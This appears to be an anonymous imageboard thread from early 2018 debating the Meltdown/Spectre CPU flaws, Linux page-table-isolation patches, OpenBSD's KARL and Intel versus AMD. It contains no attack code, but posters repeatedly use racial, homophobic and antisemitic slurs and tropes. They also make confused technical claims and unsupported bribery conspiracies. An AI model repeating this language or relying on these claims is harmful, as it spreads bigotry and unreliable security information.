▶ No.846713
>>846710
Wondering about that too, haven't seen any bare metal hypervisors mentioned.
▶ No.846718
>>846703
>KARL
>Developed by Theo de Raadt, KARL will work by generating a new kernel binary at install, upgrade, and boot time. If the user boots up, upgrades, or reboots his machine, the most recently generated kernel will replace the existing kernel binary, and the OS will generate a new kernel binary that will be used on the next boot/upgrade/reboot, constantly rotating kernels on reboots or upgrades.
>KARL should not be confused with ASLR --- Address Space Layout Randomization — a technique that randomizes the memory address where application code is executed, so exploits can't target a specific area of memory where an application or the kernel is known to run.
>"It still loads at the same location in KVA [Kernel Virtual Address Space]. This is not kernel ASLR!," said de Raadt.
>Instead, KARL generates kernel binaries with random internal structures, so exploits cannot leak or attack internal kernel functions, pointers, or objects. A technical explanation is available below.
>so exploits cannot leak
<leak
What did Theo mean by this?
▶ No.846721>>846722
>>846683
That depends. OpenBSD tends to also be ahead of the game when it comes to security holes. Maybe one of their random mitigation tricks happens to prevent it? At this point it's all speculation though.
▶ No.846722>>846725
>>846721
No, you can't prevent a hardware bug short of cutting off access to the hardware affected. This bug is in the hardware design of any x86 CPU with a MMU. OpenBSD handles their security valiantly compared to other OS's. But even they can't fix hardware issues like this one in software.
▶ No.846723>>846725 >>847341
cool was considering switching over to AMD and this just sealed the decision
▶ No.846725>>846726 >>846727 >>846732 >>846739
>>846722
What they're doing with Windows and Linux is a mitigation because obviously they can't patch out broken hardware. Same issue with 3DS, where they can't patch out their bootloader, they can only try their best to hinder you from getting sufficient access to change it. It just wouldn't surprise me if OpenBSD had pre-empted the issue in some way, whatever it is. Apparently we'll know on the 4th for sure.
>>846723
I'm most pissed off because of the dearth of AMD-based laptops, in particular, the lack of anything approaching Thinkpads or Toughbooks in general hardware quality, and that they've got their own blob issues and Intel ME type rubbish.
If it was a PC-based solution I was interested in I'm more interested in POWER9.
▶ No.846726
>>846725
*to exploit the bootloader, bad wording. There's several serious flaws that allow early persistent takeover of the system.
▶ No.846727
>>846725
There's still old powerpc macbooks out there if you are looking for slightly more secure hardware. Just slap openbsd and coreboot on one and you are good to go.
▶ No.846729>>846733
>>846712
Think I found the reason in the full diff:
This has a down side: the LDT isn't (currently) randomized, and an attack
that can write the LDT is instant root due to call gates (thanks, AMD, for
leaving call gates in AMD64 but designing them wrong so they're only useful
for exploits). This can be mitigated by making the LDT read-only or
randomizing the mapping, either of which is strightforward on top of this
patch.
This will significantly slow down LDT users, but that shouldn't matter for
important workloads -- the LDT is only used by DOSEMU(2), Wine, and very
old libc implementations.
Now that the LDT mapping is in a known area when PAGE_TABLE_ISOLATION is
enabled its a primary target for attacks, if a user space interface fails
to validate a write address correctly. That can never happen, right?
The SDM states:
If the segment descriptors in the GDT or an LDT are placed in ROM, the
processor can enter an indefinite loop if software or the processor
attempts to update (write to) the ROM-based segment descriptors. To
prevent this problem, set the accessed bits for all segment descriptors
placed in a ROM. Also, remove operating-system or executive code that
attempts to modify segment descriptors located in ROM.
So its a valid approach to set the ACCESS bit when setting up the LDT entry
and to map the table RO. Fixup the selftest so it can handle that new mode.
Gotta love the Intel shills poking at AMD (The first bit on Intel chips was reformatted, the AMD bit was added):
+ * On Intel CPUs, if a SYSCALL instruction is at the highest canonical
+ * address, then that syscall will enter the kernel with a
+ * non-canonical return address, and SYSRET will explode dangerously.
+ * We avoid this particular problem by preventing anything executable
+ * from being mapped at the maximum canonical address.
+ *
+ * On AMD CPUs in the Ryzen family, there's a nasty bug in which the
+ * CPUs malfunction if they execute code from the highest canonical page.
+ * They'll speculate right off the end of the canonical space, and
+ * bad things happen. This is worked around in the same way as the
+ * Intel problem.
More nuggets:
Note: PCID is generally available on Intel Sandybridge and later CPUs.
Note: Up until this point TLB flushing was broken in this series.
PARAVIRT generally requires that the kernel not manage its own page tables.
It also means that the hypervisor and kernel must agree wholeheartedly
about what format the page tables are in and what they contain.
PAGE_TABLE_ISOLATION, unfortunately, changes the rules and they
can not be used together.
▶ No.846732>>846907 >>846908 >>846914 >>846917
>>846725
Well OpenBSD just implemented karl in the official release that came out in October. They say they did it in 3 weeks. Why the rush to completely re-implement how the kernel works and is loaded?
https://marc.info/?l=openbsd-tech&m=149732026405941&w=2
It would be interesting if they mitigated the issue by (((pure coincidence))).
▶ No.846733
▶ No.846734>>846738
this is pissing me off even thinking all my vm's are going to take a fucking 35% performance hit. but my anger has to be nothing compared to every cloud corporate kike out there who is itching to shove their dick in intel/amd's asshole for the billions of dollars that's going to cost them.
▶ No.846738>>847060 >>847341
>>846734
This is Intel only actually. AMD apparently does not cut corners. Really makes you think in terms of how Intel always seems untouchable in single core performance.
In the end though, you deserve it. I think your anger is magnified by the fact that you trusted Intel.
▶ No.846739>>846749
>>846725
Wait, you mean the Nintendo 3DS?
Nintendo can patch boot9 whenever they want. The reason they can't after people hack it is because Luma puts FIRM into read-only mode
As far as the new DS flashcard based hacks go, that isn't the result of a security flaw, rather, the bootloader is "backdoor'd" (more specifically so Nintendo Repair centers can re-flash the OS in the event someone sends in a bricked console as a result of a botched firmware update)
▶ No.846749
>>846739
What they can't do is patch out the errors that allow B9S (or A9LH) to happen. Those are in the read-only bootrom. Actually, that's something they tried to account for in the Switch, which has a way to generate bootrom "patches". Kind of cute but they should've focused on getting it right to begin with since it's the root of trust.
▶ No.846752>>846753 >>846755
intel did this on purpose to destroy the old non-me botnet market. i'll bet they disclosed the bug themselves through an intermediary, at the appropriate, most profitable time.
▶ No.846755>>846757 >>846760
>>846752
That's just preposterous tinfoil since the bug affects pretty much all Intel CPUs except possibly some old ones without ME. The scale of the problem isn't known.
▶ No.846757>>846759
>>846755
>the scale of the problem isn't known
It affects all x86 cpu's with a MMU. Did you even read the fucking thread and links?
▶ No.846759>>846761
>>846757
Since when do we know about the actual exploit? It's under wraps until the 4th supposedly.
▶ No.846760
>>846755
Pentium 1's are the "newest" intel cpu to be confirmed not affected. Intel managed to fuck up so badly that they took an obsolete class of exploits that everyone had forgotten about and single handedly brought it back from extinction.
While the actual circumstances under which this bug could be exploited are very, very limited, the nature of the use cases (virtualization) make this pretty severe and indirectly effects everyone.
▶ No.846761
>>846759
Lurk twenty years you giant faggot.
▶ No.846762>>846828
https://www.phoronix.com/scan.php?page=news_item&px=x86-PTI-Initial-Gaming-Tests
So my intuition proved correctly, applications that run mainly in usermode are not affected by this whatsoever. You can all stop shitflinging now you insufferable fanboys
▶ No.846764>>846765 >>846766
Higher AWS bill and having to reboot everything? My job is going to be a bit more exciting, thanks Intel.
▶ No.846765
>>846764
You think a reboot is going to clear the MMU?
▶ No.846766
>>846764
What else do they pay you for?
▶ No.846767>>846768 >>846810
If I only run free software which I trust I should not need this kernel patch right? All I need the computer for is browse the internets and compile my c++.
▶ No.846768>>846771 >>846772
>>846767
Well considering you can deliver this infection via just loading javascript into memory, you better absolutely trust everything that runs on your computer will never be hacked or targeted in some fashion. While also always browsing and blocking literally everything but text on the interwebs. Even then things like CSS quirks in browser can be abused to hack you. But I don't think anyone is that autistic for the gerneral population yet.
TLDR if you want real security stop using x86. If you want the feeling of security get the patch. If you want speed and to possibly be spied on then don't get the patch.
▶ No.846771>>846778
>>846768
>if you want real security stop using x86. If
Every major architecture has at least 1 privileged mode. At least x86 is actually being actively audited for security do to its ubiquity. Maybe don't use x86 if you're a cum drinking retard
▶ No.846772>>846783 >>846815
>>846768
>you can deliver this infection via just loading javascript into memory
source on this? it is possible to write a javascript or webassembly program which directly exploits the cpu bug?
▶ No.846776>>846786
>doesn't affect TempleOS
How will Linux ever recover? That's what you get for not writing an OS like a white person, you NIGGER!
▶ No.846778>>846780
>>846771
>Silly goy, every processor has privileged modes!
>implying any other architecture holds a candle to this irredeemable Matryoshka clusterfuck
▶ No.846780>>846818
>>846778
>This architecture has too many transistors look at this block diagram see how much I know about compooters!
When's Winter Break going to be over again?
▶ No.846782>>846784
Is there a current list of affected intel processors at this time?
I'm still using gentoo hardened kernel on my core duo.
Did it affect the Pentium D processor?
▶ No.846783
>>846772
>webassembly
Oh don't even get me started on that cancer. Lurk two years if you want to know more.
▶ No.846784>>846788
>>846782
It likely does affect the Pentium D. But unless you run a database that needs to access kernel mode memory from usermode numerous times a day, you will likely not notice a difference. Standard usermode application like web browsers and even the latest AAA video games have been benchmarked and have seen absolutely no performance impact whatsoever
▶ No.846786>>846793 >>846947
>>846776
>>doesn't affect TempleOS
Because programs already use ring 0 you retard. There's no need for an exploit, the botnet has free access.
▶ No.846787>>846790
FYI: The performance hits will be the worst on programs that do a lot of syscalls and nothing else, like networked programs and shit that needs IO. CPU intensive tasks have no difference.
▶ No.846788>>846790
>>846784
Is it worth moving from hardened sources?
Would there be a grsec kernel with KASLR that is freely available any more?
Is there another way to migitate the flaw using hardened?
▶ No.846790>>846797 >>846807
>>846787
It seems like literally only server software that needs to abstract kernel memory and access it from usermode for security reasons is affected. That's why Google and Amazon are shitting themselves
For everyone else though, there is absolutely no performance penalty whatsoever and its just business as usual
>>846788
Page Table Isolation is already rolled out to the latest kernels to mitigate it AFAIK. Obviously this comes with the aforementioned performance penalty, but this can be solved with better optimization of how kernel and userspace are abstracted and is really a quick and dirty fix for now
Incidentally, Macfags will likely never notice a difference since OSX already uses PTI
▶ No.846793
▶ No.846797
>>846790
I'm not using the latest one. I'm using the latest freely released grsec kernel that is no longer supported.
I still like all of the security features to be kept so that why I'm not really upgrading.
▶ No.846807>>846828 >>846829
>>846790
> just business as usual
▶ No.846810>>846813
>>846767
this kernel patch is going to get shoved down your throat weather your like it or not. the only way to avoid it is to never update your kernel ever again.
▶ No.846813
>>846810
Or compile your own kernel with it disabled since only distro maintainers will be blackmailed/coerced by (((them))) to enable the botnet or disable it by default. It still won't save you if you use x86 though.
▶ No.846815
>>846772
Javascript can be used to achieve arbitrary code execution if there is an vulnerability in the web browser. Once this has been reached the x86 vulnerability could be exploited.
▶ No.846818>>846826
▶ No.846820>>846826
WUZ
been waiting for someone to call that out
▶ No.846826
>>846818
>>846820
Meds aren't black though?
▶ No.846828
▶ No.846829>>846830
>>846807
The only applications that are impacted are PCI based storage and database programs
Video games, web browsers, and fucking hell, productivity applications like video editors and Photoshop, will have no performance impact. Stop being a cocksucking fanboy for 2 seconds. The major of users aren't going to see a difference
▶ No.846830>>846832
>>846829
Oh the majority of people will see a difference in their backend performance, and this is a major screw-up for a hardware vendor.
▶ No.846831
>>846194
OMG GONAD GLOMPF BTFO HOW WILL HE EVER RECOVER
▶ No.846832>>846834 >>846845
>>846830
No they will not because the majority of programs the average user interacts with are run completely in userspace and do not need to access kernel mode memory a million times a day like database programs. This is why gaming benchmarks are seeing 0 percent performance impact. The only people who should care are server admins. That's why Google and Amazon are shitting themselves right now.
Of course throwing all logic and reason out the window to be a mouth-breathing fanboy is far easier than using your brain so I'm not surprised
▶ No.846834>>846836
>>846832
Just what do you think I meant by backend performance? The online services people use will run slower and/or pass their costs down, or maybe be idiotic and just run it insecurely. It's gonna matter, and it'll probably hurt Intel (which I'm fine with).
▶ No.846836>>846841 >>846842
>>846834
The whole internet isn't going to slow down as a result either though, retard, Amazon and Jewgle won't let that happen. They'll probably all switch to Threadripper servers before they let that happen. Overall its likely they'll come up with a better workaround, it's likely this can be fixed with better optimization with privileged memory access
Overall the only party here's getting hurt is Intel, which I couldn't care less about, as long as muh gaems run fine and I don't feel like I completely wasted my money on my Skylake, next processor will certainly be Ryzen though
▶ No.846841
>>846836
I have no idea about Amazon but Google do mix architectures to avoid this, they've got a lot of POWER running around.
▶ No.846842
>>846836
I'm hardly preaching the apocalypse over this. But it's not some trivial issue either, I for one am pretty pissed off that this sort of flaw exists when they should know better.
▶ No.846845>>846847
>>846832
>what is (insert botnet browser)'s massive cache
enjoy seeing pozfox slow down to a crawl as it makes 500 system calls saving all of the web5.0 frameworks files, and the browsers built-in indexeddb, and all the telemetry and history, all over the harddrive. dont forget all the io that windows 10 generates with it's botnet.
▶ No.846847>>846855 >>846856
>>846845
There's little reason any browser should be making any calls to kernel mode memory. Modern web browsers in fact tend to sandbox tabs and applets for security reasons. If your web browser requires direct kernel memory access you shouldn't be using that browser today begin with
▶ No.846855>>846860
▶ No.846856>>846857 >>846858
>>846847
Repeating your Intel fanboy paroles will not make them true. Kill yourself you fucking moron. No user space program accesses kernel memory holy shit how retarded are you. This will slow down *everything* that needs syscalls, the more it needs / time the larger the slowdown, how about shut your idiot mouth you worthless piece of shit.
▶ No.846857>>846868
>>846856
Why the fuck are usermode programs seeing 0 percent performance impact with PTI enabled then?
This isn't fanboyism, it's fucking reality, and people like you are salty for no fucking reason other than the fact you have no cannon fodder to feed your shitstorm on anonymous imageboards you condescending twat
▶ No.846858>>846872
>>846856
>This will slow down *everything* that needs syscalls
This isn't about syscalls, this is about usermode programs needing to access kernel mode memory. Video games and web browsers do not need to access memory in kernel mode and api calls they require are likely exposed in usermode memory.
The biggest impacts are web databases that need to run in usermode to serve data for security reason while also needing to access kernel mode memory millions of times a day. This will also impact PCI mode SSDs because filesystems are typically run in kernel space
We are all adults here anon please act like one
▶ No.846860>>846861
>>846855
GL web apps, much like video games, call the usermode GPU drivers. Again, hence why video games are not impacted on Linux. Not sure how Windows is going to deal with this since kernel and user mode abstraction is all over the fucking place on Windows but the upcoming patch will likely deal with it
▶ No.846861>>846864 >>846884
>>846860
>Again, hence why video games are not impacted on Linux.
Because it doesn't have any?
▶ No.846864
>>846861
Well this probably wont impact performance on WINE either since I don't think the WINE devs would be retarded enough to allow Windows applications to directly access kernel memory to begin with
▶ No.846865>>846870
>>846194
>muh /pol/ for no reason at all
Nigger.
▶ No.846867>>846869
https://www. phoronix.com/scan.php?page=news_item&px=x86-PTI-EPYC-Linux-4.15-Test
apparently "20year lurker" man is vindicated somewhat
▶ No.846868>>846873
>>846857
>Why the fuck are usermode programs seeing 0 percent performance impact with PTI enabled then?
Because some programs do no/very few syscalls.
▶ No.846869
>>846867
>spacing URLs like you're on halfchan
Seriously man lurk 2 years at minimum
▶ No.846870
>>846865
/pol/jeet detected
▶ No.846872>>846876
>>846858
NO USERSPACE PROGRAMS ACCESS KERNEL MEMORY, THAT IS THE POINT OF THE SEPARATION
▶ No.846873
>>846868
This isn't about syscalls necessarily, this is about usermode programs needing to access kernel mode memory. If an application runs entirely in usermode, or entirely in kernel mode, it is not effected. If a kernel mode program needs to access usermode, it is not effected, but if a usermode application needs to access kernel mode, it is effected. The overhead is because usermode applications now need gated access to kernel memory and kernel memory is no longer freely exposed to usermode programs
▶ No.846875
>>846648
Android is Linux with even more evil inside.
▶ No.846876
>>846872
Wrong. Kernel space is typically exposed to user space via virtual memory for performance reasons. Its the kernels job to manage what data can be read freely. The Intel CPU bug allows all memory that would normally be unreadable to be exposed to usermode applications, hense why page table isolation is now necessary.
▶ No.846882>>846886 >>846910 >>846912 >>846965
I am regretting this purchase less and less every day.
▶ No.846884>>846890 >>846897
>>846861
>what is steam on linux
▶ No.846886
>>846882
>regretting it in the first place
▶ No.846889
▶ No.846890>>846897
>>846884
Something that doesn't respect your freedoms?
▶ No.846897
>>846890
>>846884
speaking of not respecting freedoms, i wonder how many syscalls steam for linux makes with VAC. steam probably wasn't included in that benchmark
▶ No.846902>>846913
If jewgle etc. adopt threadripper where will I get my hands on the stuff they're dumping?
Do I hang around the dumpster out back or something?
▶ No.846907>>847435 >>848209
>>846732
>OBSD might have broken another embargo
DEAL WITH IT
▶ No.846908>>846922
>>846732
>Our immune systems work better when they are unique. Otherwise one
airline passenger from Singapore with a new flu could wipe out Europe
(they should fly to Washington instead).
Sick. Not as sick as FUCKWIT but still pretty hot.
▶ No.846910>>847079
>>846882
>8 cores
How did AMD get away with this?
▶ No.846912>>846941
>>846882
Are there even any coreboot compatible AM3 mobos?
▶ No.846913
>>846902
>Do I hang around the dumpster out back or something?
Shredding machine. Everything gets "recycled" because global jewrming/muh eco/whatever.
▶ No.846914
>>846732
I wonder who use it as a host system as their most advanced vm system is chroot.
Next time they and loonix devs should hide userspace from users for even greater security. :^)
▶ No.846917
>>846732
There wasn't any rush. This randomization has been in the works for several releases. In fact, over a year ago someone on misc was asking about running OpenBSD with disk mounted read-only, and one of the developers (or maybe even Theo) said that was no longer supported because now libraries get randomized on every boot. Doing the same with kernel was just the next logical step.
▶ No.846922
>>846908
>they should fly to Washington instead
▶ No.846939>>846940
Will PS4/Xboner have the same issue since they're x86 based? Could this lead to finally getting them cracked open?
▶ No.846940>>846972
>>846939
ayymd not affected. I wonder if intel will delay their new chips due to this
▶ No.846941
>>846912
Yes, search the coreboot wiki nigger.
▶ No.846945>>846984
>>846180 (OP)
AMIGA FOREVER
PC BTFO
▶ No.846947
>>846786
>botnet
>TempleOS has no net stack
▶ No.846970>>847001
Shills will defend this and cover it up and say nothing is going on. Remember that.
▶ No.846972>>846991 >>847341
>>846940
>ayymd not affected
Close inspection of kernel patches reveal code that forces machines running all x86 processors, Intel or AMD, to be patched, regardless of the fact that AMD processors are immune. Older commits to the Linux kernel git, which should feature the line "if (c->x86_vendor != X86_VENDOR_AMD)" (condition that the processor should be flagged "X86_BUG_CPU_INSECURE" only if it's not an AMD processor), have been replaced with the line "/* Assume for now that ALL x86 CPUs are insecure */" with no further accepted commits in the past 10 days. This shows that AMD's requests are being turned down by Kernel developers.
https://archive.is/kFte4
▶ No.846973>>846974
No surprises here. Every tech expert and their dogs knows that with intel you lose.
Amazing that big corps like amazon and google that have a lot of money to lose don't know this.
Trusting intel is just as bad as trusting microsoft.
▶ No.846974>>846977
>>846973
but the tech expert linus tech tips told me intel has more "platform stability" :(
▶ No.846977
>>846974
he is the most trusted source of unbiased tech related information, everything from obscure operating systems like linux and *bsds, to nerf guns. weird how he got that one wrong
▶ No.846991>>847000
>>846972
Amazing.
Just how many fucking shekels are Intel paying Linus (torvalds, not tech tips. honestly, what's the difference anymore?) to make their horrible processors look good? I really am beginning to realize that Linux is really just as untrustworthy and shady as Windows. Fuck this gay earth.
▶ No.847000
>>846991
>I really am beginning to realize that Linux is really just as untrustworthy and shady as Windows
I wouldnt go that far but this case is pretty shady indeed.
▶ No.847001
>>846970
They have been. Look at all the "muh kernel memory access" droolposting above from someone paid to not understand what a fucking syscall is.
Fun fact: every time an extension icon redraws in chrome/chromium it writes the image to a berkdb database on disk and forces a sync (inotifywatch $profiledir/Extension\ State if you don't believe me). Imagine how many other retarded things your entire desktop must be doing 50 times a minute.
▶ No.847003
>>846194
Breathe deeply, Herschel.
▶ No.847006>>847023
>>846194
Easiest PowerPC to get ahold of: G3 and G4 PowerBooks and iBooks. Get them with nice shattered screens. They'll be comparable to or a little slower than an Intel Pentium 4. You should be able to find them for next to nothing online.
Shattered screen is best because you can take the thing off, throw it away, and plug in a VGA monitor and have a 'slab' computer with built in keyboard and mouse. You just need to add an OpenFirmware script which re-aliases screen from Stone_A to Stone_B so that the Linux kernel will display on the correct output device (VGA monitor rather than shattered LCD screen).
▶ No.847013
>>846211
>Why do I find this so hard to believe?
Dunno. Why do you? I remember some early AMD Phenoms being hit with a similarly costly kernel workaround for a bug in the MMU HW. It wouldn't even be the first time.
▶ No.847023>>847026
>>847006
I was considering this too. The problem is that the source code for the "openfirmware" BIOS has been shoahed off the internet. The oldest archive of it is two years old. That is alot of time to fuck up or botnet the firmware of the physical powerbooks. Unless someone has a backup of it there's no real reason to go down this path since you still have similar shiitty problems using openbsd on it as on x86 because of known BIOS/openfirmware bugs/trojans. the screens are really easy to fix though if you know what you are doing you could even upgrade/replace the screen if you go and upgrade the on board GPU at the same time using something like a newer AGP card or a self-made AGP to pci-e mini converter
▶ No.847026>>847031 >>847034
>>847023
>openbsd
No Mandatory Access Control. How could it be taken seriously?!!
Also no bootable encrypted root with OpenBSD. Crypto and ZFS are theoretically possible with ppc32 grub2. Therefore Hardened Gentoo GNU/SELinux wins.
▶ No.847031>>847041
>>847026
>grub
>on openfirmware
Were you born retarded? You don't need grub when you can modify the firmware you giant faggot. That's why I was talking about the source code for the openfirmware project so that support for encrypted drives could be added in forth instead of the insane systemdicks mess that grub2 is. That and fixing firmware bugs. But it was shoahed off the internet you stupid fuck.
▶ No.847032>>847033
Watching all the shill arguments about how this isn't a big deal is really eye opening. If Nvidia or AMD sold you a graphic card, and then went
>well we found a bug
>some specific situations will be half as fast as they were before!
>Sorry!
you'd be pissed off if Nvidia or AMD got online and went
>well it only affects a small portion of customers and look here's some times where it barely affected performance
People bought these Intel CPUs after looking at benchmarks and expecting a certain level of performance. Now now, we're seeing worst case scenarios where post-patch the Intel CPU is running half as fast as it used to.
Anyone who tells you a product that isn't what you thought it was isn't a big deal is not your friend. They are lying and full of shit. All these fucking tech sites
>Buy the Intel, it's 5% faster overall!
>Intel is 10% faster in games! It scored 110 instead of 100!
>Get the Intel!
<losing 50% of performance with Intel in some situations isn't bad
<buy more Intel!
▶ No.847033
>>847032
someone needs to file a class action lawsuit against intel for false advertising. They knew about this but didn't want to disclose it because it would hurt sales. Fucking kike CEO even dumped his stocks early in december.
▶ No.847034>>847038
>>847026
OpenBSD has encrypted /root, the install docs page has a whole segment on it. In fact, OpenBSD has a full encrypted disk, i.e. /boot and /root.
You're just a retard.
▶ No.847038>>847050
>>847034
... until you find out ofwboot doesn't support reading that FDE.
You're just a retard calling others retard.
▶ No.847041>>847050
>>847031
>source code for the openfirmware project
You mean https://github.com/openbios ?
▶ No.847043
word on the street is it will be unembargoed (soon)
▶ No.847047
>>846668
>it's a CPU bug that is so bad it has to be fixed by working around it on a software level.
Holy fuck. Shit's serious.
▶ No.847048
>>846649
You learn to do that over time when working in a large corpo.
▶ No.847050>>847119
>>847041
That's the sparc version and possibly a botnet. We need the powerpc version for powerbook macs. It used to be located here https://archive.fo/GEbMu but here is the shoahed version https://archive.fo/vlWP3 . Anyone have a backup?
>>847038
You are a even larger colossal retard. If you have the source code to the "openfirmware" on macbooks you can just program it to read FDE instead of adding the bloat that would be grub2.
▶ No.847052>>847057
Why is AMD not taking advantage of this to push Epyc?
▶ No.847053
>>846688
>what is a workaround
▶ No.847054>>847057
If I turn off virtualization features in my bios, am I unaffected? This should mostly impact public clouds right?
▶ No.847057>>847059 >>847063 >>847478
>>847052
They don't need to. These fixes for Intel are completely clobbering Intel disk performance. Which means all those giant websites with massive databases are going to get fucked.
Imagine you run something like Facebook or Twitter and when you get his new updated kernel, you lose 50% of your database performance when database has to go to disk.
Intel is currently trying to bribe Microsoft and Linux to making sure this patch applies to all x86 CPUs, including the AMDs that this doesn't affect. I assume AMD is staying quiet, for now, because no one really knows if the patch to fix Intel is going to also apply to AMD.
>>847054
Nope, this affects everything, and the "fix" that destroys performance is coming to your kernel very soon, unless you compile your own. Shills are just trying to write this off as something that only affects database and virtualization. It affects those more than anything, but performance is going to tank over a lot more than that, and it's going to make a lot of things massively insecure.
The paid off tech sites are already starting to write this off as just a datacenter issue and then wagging 3 gaming benchmarks in front of people's face so they can go
>look your games are still just as fast!
>keep buying Intel!
▶ No.847059>>847061
>>847057
I thought AMD was not affected by this? This is a Intel hardware bug.
▶ No.847060>>847061
>>846738
All high-performance CPU manufacturers cut corners. This is literally necessary for extracting decent IPC from real-world programs. The question is which corners get cut, and how the implications of cutting them were handled/mitigated. Sometimes the mitigations turn out to be buggy/incomplete. That's the risk you take every time you do hacky stuff.
By the way, this is not limited to hardware. Performance hacks in software also come with a decent risk of unforeseen consequences. Sometimes they blow up right in your face, and fixing those blowing corner cases is not trivial. Oh well.
▶ No.847061>>847064 >>847085
>>847059
It is, and they are trying to make sure the fix is applied to AMD so AMD CPUs are slowed down too. They are also trying to be as ambiguous as possible by saying shit like
>well it's not confirmed if it affects AMD or not
Intel knows that if its performance is going downhill, they will try and take AMD's with it too. They are joust like Nvidia, if they have to change software to make their product slower, they'll do everything they can to make sure it negatively affects their competitors more.
>>847060
This doesn't affect AMD CPUs. So you are saying AMD cuts fewer corners? Also, why is Intel cutting corners in a situation that could affect security so massively? I can understand 5.0 + 5.0 = 10.0000001, but this is on a different level.
▶ No.847063>>847066
>>847057
Linux is patched for all x86 CPU, not only Intel. AMD has stated this does not affect their CPU, and has also written a patch to detect whether to apply the fix or not based on vendor, but it is unknown if it will be merged on 4.15 or 4.16. For all we know, x86 performance may be affected for all CPU for a month, but it should be fixed at least by 4.16.
▶ No.847064
>>847061
Intel really is a pit of jew snakes.
▶ No.847066
>>847063
This fix is getting backported to earlier kernels. You think AMD's patch is going to affect all those other LTS kernels and such? The fact that you're going to have to patch your kernel if you're on AMD, because of an Intel bug, really shows how much control Intel has over the x86 ecosystem.
▶ No.847069>>847075
>>847067
>this isn't a bug!
>we'll work with ARM and AMD to fix it!
>it could affect them too!
>lots of other CPUs have problems!
>but these problems aren't bugs or flaws!
>it only affects workloads! If you don't give your CPU workloads, it's not slower!
>some workloads might not even be affected at all!
>your games will be fine!
Predictable.
▶ No.847071
>>847067
Even the cucks at hacker news aren't buying it.
▶ No.847075
>>847069
Let's not forget this gem right here. Those 300M$ sure are paying their dividends off.
▶ No.847079>>847087
>>846910
They are now forgiven after they introduced actual 8-cores at consumer price points.
▶ No.847081>>847130 >>847132 >>847133
Does anyone know which config option does the patch refer to in the new kernel?
▶ No.847083>>847084
▶ No.847084>>847140
▶ No.847085
>>847061
>So you are saying AMD cuts fewer corners?
No, I'm saying they chose to cut different corners.
>Also, why is Intel cutting corners in a situation that could affect security so massively?
You don't know what it could affect beforehand. Hacks tend to have unpredictable consequences.
▶ No.847087
>>847079
You did get 8 integer cores with the bulldozer family, so they weren't lying completely
They also publicised the halving of FPUs at the time so there's nothing to forgive really, people should just have RTFM before purchasing something that didn't satisfy their needs
▶ No.847088
>>847067
this is weak damage control
▶ No.847090
>dude, you got hacked!
>intel inside!
▶ No.847091>>847094
I can feel the collective piledriver smug in here. Feels pretty good.
▶ No.847092>>847095
I would love it if AMD could speed up the launch of their next Ryzen chips to take advantage of this.
▶ No.847093>>847122 >>847173
▶ No.847094>>847112
>>847091
FX CPUs get shit on by the mustard race, but it's not a bad CPU for the price. Even if the '8 cores' thing was always bullshit.
▶ No.847095>>847096 >>847098 >>847099
>>847092
>I would love it if AMD could speed up the launch of their next Ryzen chips to take advantage of this.
>wanting botnet
The only reason that I would buy amd is when they'll release the hardware source.
▶ No.847096>>847101
>>847095
nice man me too, what CPU are you using now? I have a core i5 :^)
▶ No.847097>>847103
>>847067
That's "there are no tanks in bahgdad" levels of bullshit. The Linux patches specifically indicate AMD doesn't need the workarounds and 'there is no significant penalty yet it will be migtated over time' is some lol. How's that $300M of diversity, doing, Intel?
▶ No.847098
>>847095
Your post is worthless if you aren't making it from a Commodore 64 my friend.
▶ No.847099>>847101 >>847102 >>847104
▶ No.847101
▶ No.847102
>>847099
Nice man I'll switch from Intel to AMD once AMD open sources all their hardware too. Until then I'll stay on Intel :^)
▶ No.847103>>847106
>>847097
>The Linux patches specifically indicate AMD doesn't need the workarounds
AMD is still vulnerable. Note how that line is no longer in Linus' tree.
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/cpu/common.c#n927
▶ No.847104
>>847099
>More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013).
>Pentium 4
>2000 to 2008
▶ No.847106>>847110 >>847114
>>847103
That comment just says they are going to assume all x86 CPUs are affected, not that AMD (and Via) are affected. Kind of funny how Via gets excluded from all of this, it's almost like Intel is just trying to drag their main competition into this and they're not actually worried about all x86 CPUs.
▶ No.847107>>847124
>tell me lies, tell me sweet little lies~
▶ No.847110>>847113 >>847115 >>847137
>>847106
from the website for the attack
>Which systems are affected by Spectre?
>Almost every system is affected by Spectre: Desktops, Laptops, Cloud Servers, as well as Smartphones. More specifically, all modern processors capable of keeping many instructions in flight are potentially vulnerable. In particular, we have verified Spectre on Intel, AMD, and ARM processors.
▶ No.847112
>>847094
>Even if the '8 cores' thing was always bullshit.
Not really. It's 8 ALUs and 4 FPUs, so it depends on your workflow x264 really like those CPUs.
▶ No.847113>>847122
>>847110
Only spectre. If you read the rest of the page, Spectre isn't the one that is requiring kernel patching, only Meltdown does. Spectre looks like it'll be a compiler fix with some patching to existing software. Meltdown is the one that needs kernel patches, and so far it's only confirmed to work on Intel.
▶ No.847114>>847120 >>847121 >>847123
>>847106
Via has been out of the game for how long now?
▶ No.847115
>>847110
>Is there a workaround/fix?
>There are patches against Meltdown for Linux ( KPTI (formerly KAISER)), Windows, and OS X. There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre .
The patch is for Meltdown, good try Jewtel.
▶ No.847118
Looks like there is at least one more vulnerability being announced: https://xenbits.xen.org/xsa/
It is scheduled to be uncovered in 13 hours from now.
▶ No.847119>>847137
>>847050
>You are a even larger colossal retard.
TAKES ONE TO KNOW ONE!
▶ No.847120>>847121
>>847114
I believe they are now planning to reenter it, in partnership with some chink semiconductor company.
▶ No.847121
>>847114
Their embedded market is doing very well, and now they are teaming up with the Chinese Zhaoxin ZX to make high performance x86 CPUs. They are claiming they want to hit Ryzen levels of performance in two or three years.
>>847120
Yup. It might actually provide decent competition to Intel and AMD. But it'll probably be another three or five years before they get there, and even then do you really want communist botnet?
▶ No.847122>>847143
>>847093
The Project Zero post is really interesting for any anons who want to know more about the vulnerability. Just saying.
>>847113
>Spectre looks like it'll be a compiler fix with some patching to existing software
Source?
From https://spectreattack.com/#faq-why-spectre
>Why is it called Spectre?
>The name is based on the root cause, speculative execution. As it is not easy to fix, it will haunt us for quite some time.
▶ No.847123>>847131
>>847114
I actually have a Via nano equipped thin client. Doesn't look that bad compared to Geode or Atom.
▶ No.847124>>847126 >>847172
>>847107
Why is this video so fucked up?
▶ No.847126>>847169
>>847124
How is it fucked up?
▶ No.847129
>>847067
>Recent reports that these exploits are caused by a "bug" or a "flaw"... are incorrect.
It's not a bug, it's a feature!
